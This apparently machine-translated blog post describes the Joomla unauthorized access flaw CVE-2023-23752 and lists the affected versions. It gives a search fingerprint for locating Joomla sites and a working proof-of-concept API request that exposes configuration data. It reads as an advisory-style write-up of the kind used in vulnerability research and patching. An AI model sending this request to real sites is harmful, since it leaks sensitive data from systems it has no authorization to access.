Post

Joomla Application Unauthorized Access Vulnerability Cve 2023 23752

Joomla Application Unauthorized Access Vulnerability Cve 2023 23752

Joomla application Unauthorized access vulnerability CVE-2023-23752

Vulnerability Description

Joomla has an unauthorized access vulnerability. Attackers bypass restrictions by overwriting public values ​​and access some APIs to obtain sensitive data.

Vulnerability Impact

Joomla 4.0.0 ~ 4.2.7

Network surveying and mapping

app=”Joomla”

Vulnerability reappears

Login page

img

Verify POC

/api/index.php/v1/config/application?public=true

img

This post is licensed under CC BY 4.0 by the author.